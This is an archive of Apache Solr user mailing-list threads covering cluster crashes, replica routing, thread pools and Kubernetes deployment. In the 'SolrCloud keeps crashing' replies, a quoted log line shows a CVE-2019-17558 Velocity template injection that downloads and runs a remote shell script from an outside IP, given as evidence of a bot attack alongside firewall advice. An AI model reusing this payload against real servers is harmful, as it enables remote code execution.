Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Oops, I should have referenced this document instead:

https://www.tenable.com/cve/CVE-2019-17558 



On 2/3/21 2:42 PM, TK Solr wrote:

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability 



If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:


webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*} 
status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) 
[c:sitecore_submittals_index s:shard1 r:core_node1 
x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to 
create a new queryResponseWriter with {type = queryResponseWriter,name = 
velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args 
= 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. Since then, my client's 
Solr node has been running for 4 weeks so far.  I think this security hole 
doesn't just leak information; it can also kill the Solr process.


TK





Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:



webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*}
 status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) [c:sitecore_submittals_index 
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] 
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = 
queryResponseWriter,name = velocity,class = 
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, 
class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. Since then, my client's Solr 
node has been running for 4 weeks so far.  I think this security hole doesn't 
just leak information; it can also kill the Solr process.
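
For reference, a minimal sketch of the kind of firewall rule involved, assuming a 
Linux host with iptables, Solr on its default port 8983, and an application subnet 
of 10.0.0.0/24 (all three are illustrative; adjust to your environment):

# allow Solr traffic only from the application subnet
iptables -A INPUT -p tcp --dport 8983 -s 10.0.0.0/24 -j ACCEPT
# drop everything else that reaches the Solr port
iptables -A INPUT -p tcp --dport 8983 -j DROP

The same effect can be achieved with a cloud provider's security-group rules; the 
point is simply that Solr should never be reachable from arbitrary Internet 
addresses.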


TK




Re: SolrCloud keeps crashing

2021-02-01 Thread Satish Silveri
I am facing the same issue. Did you find any solution for this?




--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


How to change the JVM Threads of SolrCloud

2021-01-21 Thread Issei Nishigata
Hello All,

I'm running SolrCloud (1 shard, 9 replicas) on Amazon EKS.

The other day, when I accidentally stopped CoreDNS on EKS,
the entire Solr cluster went down because the nodes could no longer resolve
each other's names.
I restarted CoreDNS shortly afterwards, but the Solr nodes just kept cycling
between down and recovering,
and the cluster did not return to a normal state automatically.

During this time Solr was still accepting search requests,
so I stopped search traffic completely.
After that, I executed DELETEREPLICA to reduce the number of Solr nodes to
one.
I then increased the number of replicas little by little, and after the cluster
had fully returned to its original state,
I resumed search traffic; after that, no particular problem
occurred.

At the time of this failure, the JVM thread count on each node was stuck at
1.
Since the load was very high, that is probably why each node kept going down
and recovering.
If I reduced (or increased) this JVM thread count, would the Solr cluster
automatically return to a normal state?
If so, what setting in solrconfig.xml should I change to reduce (or
increase) the JVM thread count?
I think "maxConnectionsPerHost" and "maximumPoolSize" are related to this
issue,
but I'm not sure about the difference between the two.
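
For reference, a minimal sketch of where both settings live, based on the
shardHandlerFactory described in the Solr Reference Guide; the values below are
only illustrative, not recommendations:

<!-- in solrconfig.xml, inside the search handler (e.g. /select) -->
<requestHandler name="/select" class="solr.SearchHandler">
  <shardHandlerFactory class="HttpShardHandlerFactory">
    <!-- max HTTP connections opened to any single remote node -->
    <int name="maxConnectionsPerHost">20</int>
    <!-- upper bound of the thread pool serving distributed (inter-node) requests -->
    <int name="maximumPoolSize">64</int>
    <int name="socketTimeout">60000</int>
    <int name="connTimeout">15000</int>
  </shardHandlerFactory>
</requestHandler>

My understanding is that maxConnectionsPerHost caps connections per remote node
while maximumPoolSize caps the threads handling distributed requests, but I am
not sure either one alone explains the thread explosion I saw.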

Any help would be appreciated.

Thanks, Issei


Re: Solrcloud - Reads on specific nodes

2021-01-18 Thread Shawn Heisey

On 1/17/2021 11:12 PM, Doss wrote:

Thanks Michael Gibney , Shawn Heisey for pointing in the right direction.

1. Will there be any performance degradation if we use shards.preference?
2. How does leader election work if we decide to use NRT + PULL? TLOG has the
advantage of participating in leader election, correct?
3. With NRT + TLOG, is there any parameter which can reduce the TLOG replication
time?


I have no idea what kind of performance degradation you might expect 
from using shards.preference.  I wouldn't expect any, but I do not know 
enough details about your environment to comment.


A TLOG replica that is elected leader functions exactly like NRT.  TLOG 
replicas that are not leaders replicate the transaction log, which makes 
them capable of becoming leader.


PULL and TLOG non-leaders do not index.  They use the old replication 
feature, copying exact segment data from the leader.


If you want SolrCloud to emulate the old master/slave paradigm, my 
recommendation would be to create two TLOG replicas per shard and make 
the rest PULL.  Then use shards.preference on queries to prefer PULL 
replicas.  The PULL replicas can never become leader, so you can be sure 
that they will never do any indexing.
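
As an illustrative sketch (the host and collection name are made up), a query 
that prefers PULL replicas looks like this:

http://solr-host:8983/solr/mycollection/select?q=*:*&shards.preference=replica.type:PULL

Since it is only a preference, the query still falls back to other replica types 
if no PULL replica is available for a shard.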


Thanks,
Shawn


Re: Solrcloud - Reads on specific nodes

2021-01-17 Thread Doss
Thanks Michael Gibney , Shawn Heisey for pointing in the right direction.

1. Will there be any performance degradation if we use shards.preference?
2. How does leader election work if we decide to use NRT + PULL? TLOG has the
advantage of participating in leader election, correct?
3. With NRT + TLOG, is there any parameter which can reduce the TLOG replication
time?

Have a great week ahead!

Regards,
Mohandoss.

On Fri, Jan 15, 2021 at 9:20 PM Shawn Heisey  wrote:

> On 1/15/2021 7:56 AM, Doss wrote:
> > 1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
> > nodes for writes and 6 nodes for selects?
> >
> > 2. We have a SOLR cloud setup for our customer facing applications, and
> we
> > would like to have two more SOLR nodes for some backend jobs. Is it good
> > idea to form these nodes as slave nodes and making one node in the cloud
> as
> > Master?
>
> SolrCloud does not have masters or slaves.
>
> One thing you could do is set the replica types on four of those nodes
> to one type, and on the other nodes, use a different replica type.  For
> instance, the four nodes could be TLOG and the six nodes could be PULL.
>
> Then you can use the shards.preference parameter on your queries to only
> query the type of replica that you want.
>
>
> https://lucene.apache.org/solr/guide/8_7/distributed-requests.html#shards-preference-parameter
>
> Thanks,
> Shawn
>


Re: Solrcloud - Reads on specific nodes

2021-01-15 Thread Shawn Heisey

On 1/15/2021 7:56 AM, Doss wrote:

1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
nodes for writes and 6 nodes for selects?

2. We have a SOLR cloud setup for our customer facing applications, and we
would like to have two more SOLR nodes for some backend jobs. Is it good
idea to form these nodes as slave nodes and making one node in the cloud as
Master?


SolrCloud does not have masters or slaves.

One thing you could do is set the replica types on four of those nodes 
to one type, and on the other nodes, use a different replica type.  For 
instance, the four nodes could be TLOG and the six nodes could be PULL.


Then you can use the shards.preference parameter on your queries to only 
query the type of replica that you want.


https://lucene.apache.org/solr/guide/8_7/distributed-requests.html#shards-preference-parameter

Thanks,
Shawn


Re: Solrcloud - Reads on specific nodes

2021-01-15 Thread Michael Gibney
I know you're asking about nodes, not replicas; but depending on what
you're trying to achieve you might be as well off routing requests based on
replica. Have you considered the various options available via the
`shards.preference` param [1]? For instance, you could set up your "write"
replicas as `NRT`, and your "read" replicas as `PULL`, then use the
`replica.type` property of the `shards.preference` param to route "select"
requests to the `PULL` replicas.

It might also be worth looking at the options for stable routing provided
by the relatively new `replica.base` property (of `shards.preference`
param). If you have varying workloads with distinct cache usage patterns,
for instance, this could be useful to you.

To tie this back to nodes (your original question, if a replica-focused
solution is not sufficient): you could still use replica types and the
`shards.preference` param to control request routing, and implicitly route
by node by paying extra attention to careful replica placement on
particular nodes. As it happens, I'm actually doing a very simple variant
of this -- but not in a general-purpose enough way to feel I'm in a
position to make any specific recommendations.

[1]
https://lucene.apache.org/solr/guide/8_7/distributed-requests.html#shards-preference-parameter
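
For concreteness, a minimal sketch of creating a collection along those lines with
the Collections API; the collection name and the shard/replica counts are purely
illustrative:

http://solr-host:8983/solr/admin/collections?action=CREATE&name=mycollection&numShards=2&nrtReplicas=1&pullReplicas=2

Read traffic would then add shards.preference=replica.type:PULL (optionally
combined with replica.base) to its select requests.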

On Fri, Jan 15, 2021 at 9:56 AM Doss  wrote:

> Dear All,
>
> 1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
> nodes for writes and 6 nodes for selects?
>
> 2. We have a SOLR cloud setup for our customer facing applications, and we
> would like to have two more SOLR nodes for some backend jobs. Is it good
> idea to form these nodes as slave nodes and making one node in the cloud as
> Master?
>
> Thanks!
> Mohandoss.
>


Re: Replicaton SolrCloud

2021-01-15 Thread Shawn Heisey

On 1/15/2021 7:20 AM, Jae Joo wrote:

Is non-CDCR replication in SolrCloud still working in Solr 9.0?


Solr 9 doesn't exist yet.  Probably won't for at least a few months. 
The latest version is 8.7.0.


Solr's replication feature is used by SolrCloud internally for recovery 
operations, but the user doesn't configure it at all.  SolrCloud uses 
its own mechanisms to replicate indexes.  I doubt that those mechanisms 
will disappear when version 9.0 comes out.


Thanks,
Shawn


Solrcloud - Reads on specific nodes

2021-01-15 Thread Doss
Dear All,

1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
nodes for writes and 6 nodes for selects?

2. We have a SOLR cloud setup for our customer facing applications, and we
would like to have two more SOLR nodes for some backend jobs. Is it good
idea to form these nodes as slave nodes and making one node in the cloud as
Master?

Thanks!
Mohandoss.


Replicaton SolrCloud

2021-01-15 Thread Jae Joo
Is non-CDCR replication in SolrCloud still working in Solr 9.0?

Jae


SolrCloud 8.7.0 with Zookeeper 3.4.5

2021-01-15 Thread Subhajit Das

Hi There,

I am planning to run SolrCloud 8.7.0 with an existing ZooKeeper 3.4.5 ensemble. This 
is the Cloudera-provided ZooKeeper.

Are there any red flags for such a configuration? I couldn't find any 
compatibility matrix.

Many thanks in advance.

Regards,
Subhajit


Re: solrcloud with EKS kubernetes

2021-01-14 Thread Abhishek Mishra
Hi Jonathan,
it was really helpful. Some of the metrics were crossing thresholds, like
network bandwidth.

Regards,
Abhishek

On Sat, Dec 26, 2020 at 7:54 PM Jonathan Tan  wrote:

> Hi Abhishek,
>
> Merry Christmas to you too!
> I think it's really a question regarding your indexing speed NFRs.
>
> Have you had a chance to take a look at your IOPS & write bytes/second
> graphs for that host & PVC?
>
> I'd suggest that's the first thing to go look at, so that you can find out
> whether you're actually IOPS bound or not.
> If you are, then it becomes a question of *how* you're indexing, and
> whether that can be "slowed down" or not.
>
>
>
> On Thu, Dec 24, 2020 at 5:55 PM Abhishek Mishra 
> wrote:
>
> > Hi Jonathan,
> > Merry Christmas.
> > Thanks for the suggestion. To manage IOPS can we do something on
> > rate-limiting behalf?
> >
> > Regards,
> > Abhishek
> >
> >
> > On Thu, Dec 17, 2020 at 5:07 AM Jonathan Tan  wrote:
> >
> > > Hi Abhishek,
> > >
> > > We're running Solr Cloud 8.6 on GKE.
> > > 3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
> > > configured, all with anti-affinity so they never exist on the same
> node.
> > > It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
> > > disk usage on each node is ~54gb (we've got all the shards replicated
> to
> > > all nodes)
> > >
> > > We're also using a 200gb zonal SSD, which *has* been necessary just so
> > that
> > > we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS
> for
> > > read & write each, and 96MB/s for read & write each)
> > >
> > > Various lessons learnt...
> > > You definitely don't want them ever on the same kubernetes node. From a
> > > resilience perspective, yes, but also when one SOLR node gets busy,
> they
> > > tend to all get busy, so now you'll have resource contention. Recovery
> > can
> > > also get very busy and resource intensive, and again, sitting on the
> same
> > > node is problematic. We also saw the need to move to SSDs because of
> how
> > > IOPS bound we were.
> > >
> > > Did I mention use SSDs? ;)
> > >
> > > Good luck!
> > >
> > > On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
> > > wrote:
> > >
> > > > Hi Houston,
> > > > Sorry for the late reply. Each shard has a 9GB size around.
> > > > Yeah, we are providing enough resources to pods. We are currently
> > > > using c5.4xlarge.
> > > > XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> > > > No, I haven't run it outside Kubernetes. But I do have colleagues who
> > did
> > > > the same on 7.2 and didn't face any issue regarding it.
> > > > Storage volume is gp2 50GB.
> > > > It's not the search query where we are facing inconsistencies or
> > > timeouts.
> > > > Seems some internal admin APIs sometimes have issues. So while adding
> > new
> > > > replica in clusters sometimes result in inconsistencies. Like
> recovery
> > > > takes some time more than one hour.
> > > >
> > > > Regards,
> > > > Abhishek
> > > >
> > > > On Thu, Dec 10, 2020 at 10:23 AM Houston Putman <
> > houstonput...@gmail.com
> > > >
> > > > wrote:
> > > >
> > > > > Hello Abhishek,
> > > > >
> > > > > It's really hard to provide any advice without knowing any
> > information
> > > > > about your setup/usage.
> > > > >
> > > > > Are you giving your Solr pods enough resources on EKS?
> > > > > Have you run Solr in the same configuration outside of kubernetes
> in
> > > the
> > > > > past without timeouts?
> > > > > What type of storage volumes are you using to store your data?
> > > > > Are you using headless services to connect your Solr Nodes, or
> > > ingresses?
> > > > >
> > > > > If this is the first time that you are using this data + Solr
> > > > > configuration, maybe it's just that your data within Solr isn't
> > > optimized
> > > > > for the type of queries that you are doing.
> > > > > If you have run it successfully in the past outside of Kubernetes,
> > > then I
> > > > > would look at the resources that you are giving your pods and the
> > > storage
> > > > > volumes that you are using.
> > > > > If you are using Ingresses, that might be causing slow connections
> > > > between
> > > > > nodes, or between your client and Solr.
> > > > >
> > > > > - Houston
> > > > >
> > > > > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra <
> solrmis...@gmail.com
> > >
> > > > > wrote:
> > > > >
> > > > > > Hello guys,
> > > > > > We are kind of facing some of the issues(Like timeout etc.) which
> > are
> > > > > very
> > > > > > inconsistent. By any chance can it be related to EKS? We are
> using
> > > solr
> > > > > 7.7
> > > > > > and zookeeper 3.4.13. Should we move to ECS?
> > > > > >
> > > > > > Regards,
> > > > > > Abhishek
> > > > > >
> > > > >
> > > >
> > >
> >
>


What should I do when I see a collection "recovering" in SolrCloud?

2021-01-13 Thread ufuk yılmaz
Should I keep indexing new documents, or stop indexing and wait for the collections 
to recover?

Recently our disk got 100% full and Solr started to throw various errors. So I 
deleted some unnecessary documents and committed with expungeDeletes=true. It 
freed some space but many collections went into recovery mode.

Is there a guideline on how to react to such situations?

Thanks!

Sent from Mail for Windows 10



Re: Solrcloud load balancing / failover

2020-12-26 Thread Dominique Bejean
Hi,
Thank you for your response.
Dominique

Le mar. 15 déc. 2020 à 08:06, Shalin Shekhar Mangar 
a écrit :

> No, the load balancing is based on random selection of replicas and
> CPU is not consulted. There are limited ways to influence the replica
> selection, see
> https://lucene.apache.org/solr/guide/8_4/distributed-requests.html#shards-preference-parameter
>
> If a replica fails then the query fails and an error is returned. I
> think (but I am not sure) that SolrJ retries the request on some
> specific errors in which case a different replica may be selected and
> the request may succeed.
>
> IMO, these are two weak areas of Solr right now. Suggestions/patches
> are welcome :-)
>
> On 12/11/20, Dominique Bejean  wrote:
> > Hi,
> >
> > Is there in Solrcloud any load balancing based on CPU load on Solr nodes
> ?
> >
> > If for shard a replica fails to handle a query, the query is sent to
> > another replica in order to be completed ?
> >
> > Regards
> >
> > Dominique
> >
>
>
> --
> Regards,
> Shalin Shekhar Mangar.
>


Re: solrcloud with EKS kubernetes

2020-12-26 Thread Jonathan Tan
Hi Abhishek,

Merry Christmas to you too!
I think it's really a question regarding your indexing speed NFRs.

Have you had a chance to take a look at your IOPS & write bytes/second
graphs for that host & PVC?

I'd suggest that's the first thing to go look at, so that you can find out
whether you're actually IOPS bound or not.
If you are, then it becomes a question of *how* you're indexing, and
whether that can be "slowed down" or not.



On Thu, Dec 24, 2020 at 5:55 PM Abhishek Mishra 
wrote:

> Hi Jonathan,
> Merry Christmas.
> Thanks for the suggestion. To manage IOPS can we do something on
> rate-limiting behalf?
>
> Regards,
> Abhishek
>
>
> On Thu, Dec 17, 2020 at 5:07 AM Jonathan Tan  wrote:
>
> > Hi Abhishek,
> >
> > We're running Solr Cloud 8.6 on GKE.
> > 3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
> > configured, all with anti-affinity so they never exist on the same node.
> > It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
> > disk usage on each node is ~54gb (we've got all the shards replicated to
> > all nodes)
> >
> > We're also using a 200gb zonal SSD, which *has* been necessary just so
> that
> > we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS for
> > read & write each, and 96MB/s for read & write each)
> >
> > Various lessons learnt...
> > You definitely don't want them ever on the same kubernetes node. From a
> > resilience perspective, yes, but also when one SOLR node gets busy, they
> > tend to all get busy, so now you'll have resource contention. Recovery
> can
> > also get very busy and resource intensive, and again, sitting on the same
> > node is problematic. We also saw the need to move to SSDs because of how
> > IOPS bound we were.
> >
> > Did I mention use SSDs? ;)
> >
> > Good luck!
> >
> > On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
> > wrote:
> >
> > > Hi Houston,
> > > Sorry for the late reply. Each shard has a 9GB size around.
> > > Yeah, we are providing enough resources to pods. We are currently
> > > using c5.4xlarge.
> > > XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> > > No, I haven't run it outside Kubernetes. But I do have colleagues who
> did
> > > the same on 7.2 and didn't face any issue regarding it.
> > > Storage volume is gp2 50GB.
> > > It's not the search query where we are facing inconsistencies or
> > timeouts.
> > > Seems some internal admin APIs sometimes have issues. So while adding
> new
> > > replica in clusters sometimes result in inconsistencies. Like recovery
> > > takes some time more than one hour.
> > >
> > > Regards,
> > > Abhishek
> > >
> > > On Thu, Dec 10, 2020 at 10:23 AM Houston Putman <
> houstonput...@gmail.com
> > >
> > > wrote:
> > >
> > > > Hello Abhishek,
> > > >
> > > > It's really hard to provide any advice without knowing any
> information
> > > > about your setup/usage.
> > > >
> > > > Are you giving your Solr pods enough resources on EKS?
> > > > Have you run Solr in the same configuration outside of kubernetes in
> > the
> > > > past without timeouts?
> > > > What type of storage volumes are you using to store your data?
> > > > Are you using headless services to connect your Solr Nodes, or
> > ingresses?
> > > >
> > > > If this is the first time that you are using this data + Solr
> > > > configuration, maybe it's just that your data within Solr isn't
> > optimized
> > > > for the type of queries that you are doing.
> > > > If you have run it successfully in the past outside of Kubernetes,
> > then I
> > > > would look at the resources that you are giving your pods and the
> > storage
> > > > volumes that you are using.
> > > > If you are using Ingresses, that might be causing slow connections
> > > between
> > > > nodes, or between your client and Solr.
> > > >
> > > > - Houston
> > > >
> > > > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra  >
> > > > wrote:
> > > >
> > > > > Hello guys,
> > > > > We are kind of facing some of the issues(Like timeout etc.) which
> are
> > > > very
> > > > > inconsistent. By any chance can it be related to EKS? We are using
> > solr
> > > > 7.7
> > > > > and zookeeper 3.4.13. Should we move to ECS?
> > > > >
> > > > > Regards,
> > > > > Abhishek
> > > > >
> > > >
> > >
> >
>


Re: solrcloud with EKS kubernetes

2020-12-23 Thread Abhishek Mishra
Hi Jonathan,
Merry Christmas.
Thanks for the suggestion. To manage IOPS can we do something on
rate-limiting behalf?

Regards,
Abhishek


On Thu, Dec 17, 2020 at 5:07 AM Jonathan Tan  wrote:

> Hi Abhishek,
>
> We're running Solr Cloud 8.6 on GKE.
> 3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
> configured, all with anti-affinity so they never exist on the same node.
> It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
> disk usage on each node is ~54gb (we've got all the shards replicated to
> all nodes)
>
> We're also using a 200gb zonal SSD, which *has* been necessary just so that
> we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS for
> read & write each, and 96MB/s for read & write each)
>
> Various lessons learnt...
> You definitely don't want them ever on the same kubernetes node. From a
> resilience perspective, yes, but also when one SOLR node gets busy, they
> tend to all get busy, so now you'll have resource contention. Recovery can
> also get very busy and resource intensive, and again, sitting on the same
> node is problematic. We also saw the need to move to SSDs because of how
> IOPS bound we were.
>
> Did I mention use SSDs? ;)
>
> Good luck!
>
> On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
> wrote:
>
> > Hi Houston,
> > Sorry for the late reply. Each shard has a 9GB size around.
> > Yeah, we are providing enough resources to pods. We are currently
> > using c5.4xlarge.
> > XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> > No, I haven't run it outside Kubernetes. But I do have colleagues who did
> > the same on 7.2 and didn't face any issue regarding it.
> > Storage volume is gp2 50GB.
> > It's not the search query where we are facing inconsistencies or
> timeouts.
> > Seems some internal admin APIs sometimes have issues. So while adding new
> > replica in clusters sometimes result in inconsistencies. Like recovery
> > takes some time more than one hour.
> >
> > Regards,
> > Abhishek
> >
> > On Thu, Dec 10, 2020 at 10:23 AM Houston Putman  >
> > wrote:
> >
> > > Hello Abhishek,
> > >
> > > It's really hard to provide any advice without knowing any information
> > > about your setup/usage.
> > >
> > > Are you giving your Solr pods enough resources on EKS?
> > > Have you run Solr in the same configuration outside of kubernetes in
> the
> > > past without timeouts?
> > > What type of storage volumes are you using to store your data?
> > > Are you using headless services to connect your Solr Nodes, or
> ingresses?
> > >
> > > If this is the first time that you are using this data + Solr
> > > configuration, maybe it's just that your data within Solr isn't
> optimized
> > > for the type of queries that you are doing.
> > > If you have run it successfully in the past outside of Kubernetes,
> then I
> > > would look at the resources that you are giving your pods and the
> storage
> > > volumes that you are using.
> > > If you are using Ingresses, that might be causing slow connections
> > between
> > > nodes, or between your client and Solr.
> > >
> > > - Houston
> > >
> > > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
> > > wrote:
> > >
> > > > Hello guys,
> > > > We are kind of facing some of the issues(Like timeout etc.) which are
> > > very
> > > > inconsistent. By any chance can it be related to EKS? We are using
> solr
> > > 7.7
> > > > and zookeeper 3.4.13. Should we move to ECS?
> > > >
> > > > Regards,
> > > > Abhishek
> > > >
> > >
> >
>


SolrCloud keeps crashing

2020-12-21 Thread Victor Kretzer
My setup:
3 SolrCloud 6.6.6 nodes and 3 zookeeper 3.4.14 nodes running on 3 Azure Ubuntu 
18.04 LTS VMs (1 solr/1 zk per machine).

My issue:
Every few days (1-3 days usually) I come in to find 2 of my 3 nodes down. I'm 
looking at the logs and not seeing an out-of-memory error. I do see in the 
solr_gc.logs that the GC is running more and more frequently. I also see some 
illegal type errors in the Solr logs. But I'm not sure what the actual cause of 
the crash is, and my understanding of garbage collection is rudimentary, at best.
Is there an obvious cause in the logs that I'm not understanding, or do I need 
to turn to some other resource to troubleshoot these issues?

Below is part of my logs. I can include more if helpful but they are very long. 
(>10k lines for solr.log, >53k lines for the gc.log). Please let me know if 
there is any additional information I can provide and thank you in advance for 
your help.


***
solr.log
***
2020-12-20 08:49:02.802 ERROR (qtp401424608-8936) 
[c:sitecore_submittals_index_sec s:shard1 r:core_node1 
x:sitecore_submittals_index_sec_shard1_replica2] o.a.s.s.HttpSolrCall 
null:org.apache.velocity.exception.MethodInvocationException: Invocation of 
method 'toChars' in  class java.lang.Class threw exception 
java.lang.IllegalArgumentException at custom.vm[line 1, column 376]
at 
org.apache.velocity.runtime.parser.node.ASTMethod.handleInvocationException(ASTMethod.java:243)
at 
org.apache.velocity.runtime.parser.node.ASTMethod.execute(ASTMethod.java:187)
at 
org.apache.velocity.runtime.parser.node.ASTReference.execute(ASTReference.java:280)
at 
org.apache.velocity.runtime.parser.node.ASTReference.value(ASTReference.java:567)
at 
org.apache.velocity.runtime.parser.node.ASTMethod.execute(ASTMethod.java:151)
at 
org.apache.velocity.runtime.parser.node.ASTReference.execute(ASTReference.java:280)
at 
org.apache.velocity.runtime.parser.node.ASTReference.render(ASTReference.java:369)
at 
org.apache.velocity.runtime.parser.node.ASTBlock.render(ASTBlock.java:72)
at 
org.apache.velocity.runtime.directive.Foreach.render(Foreach.java:420)
at 
org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:207)
at 
org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:342)
at org.apache.velocity.Template.merge(Template.java:356)
at org.apache.velocity.Template.merge(Template.java:260)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:169)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:810)
at 
org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:539)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:361)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:305)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1691)
at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:582)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
at 
org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:548)
at 
org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:226)
at 
org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1180)
at 
org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:512)
at 
org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:185)
at 
org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1112)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141)
at 
org.eclipse.jetty.server.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:213)
at 
org.eclipse.jetty.server.handler.HandlerCollection.handle(HandlerCollection.java:119)
at 
org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:134)
at 
org.eclipse.jetty.rewrite.handler.RewriteHandler.handle(RewriteHandler.java:335)
at 
org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:134)
at org.eclipse.jetty.server.Server.handle(Server.java:534)
at 
org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.ja

Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread kshitij tyagi
Hi erick,

Thanks. Yes, we will be upgrading to 8.8 soon.
Until we upgrade we are increasing the socket timeout, and it helps to some
extent for the time being.

regards,
kshitij

On Fri, Dec 18, 2020 at 7:48 PM Erick Erickson 
wrote:

> Right, there are several alternatives. Try going here:
> http://jirasearch.mikemccandless.com/search.py?index=jira
>
> and search for “circuit breaker” and you’ll find a bunch
> of JIRAs. Unfortunately, some are in 8.8..
>
> That said, some of the circuit breakers are in much earlier
> releases. Would it suffice until you can upgrade to set
> the circuit breakers?
>
> One problem with your solution is that the query keeps
> on running, admittedly on only one replica of each shard.
> With circuit breakers, the query itself is stoped, thus freeing
> up resources.
>
> Additionally, if you see a pattern (for instance, certain
> wildcard patterns) you could intercept that before sending.
>
> Best,
> Erick
>
> > On Dec 18, 2020, at 8:52 AM, kshitij tyagi 
> wrote:
> >
> > Hi Erick,
> >
> > I agree but in a huge cluster the retries keeps on happening, cant we
> have
> > this feature implemented in client.
> > i was referring to this jira
> > https://issues.apache.org/jira/browse/SOLR-10479
> > We have seen that some malicious queries come to system which takes
> > significant time and these queries propagating to other solr servers
> choke
> > the entire cluster.
> >
> > Regards,
> > kshitij
> >
> >
> >
> >
> >
> > On Fri, Dec 18, 2020 at 7:12 PM Erick Erickson 
> > wrote:
> >
> >> Why do you want to do this? This sounds like an XY problem, you
> >> think you’re going to solve some problem X by doing Y. Y in this case
> >> is setting the numServersToTry, but you haven’t explained what X,
> >> the problem you’re trying to solve is.
> >>
> >> Offhand, this seems like a terrible idea. If you’re requests are timing
> >> out, what purpose is served by _not_ trying the next one on the
> >> list? With, of course, a much longer timeout interval…
> >>
> >> The code is structured that way on the theory that you want the request
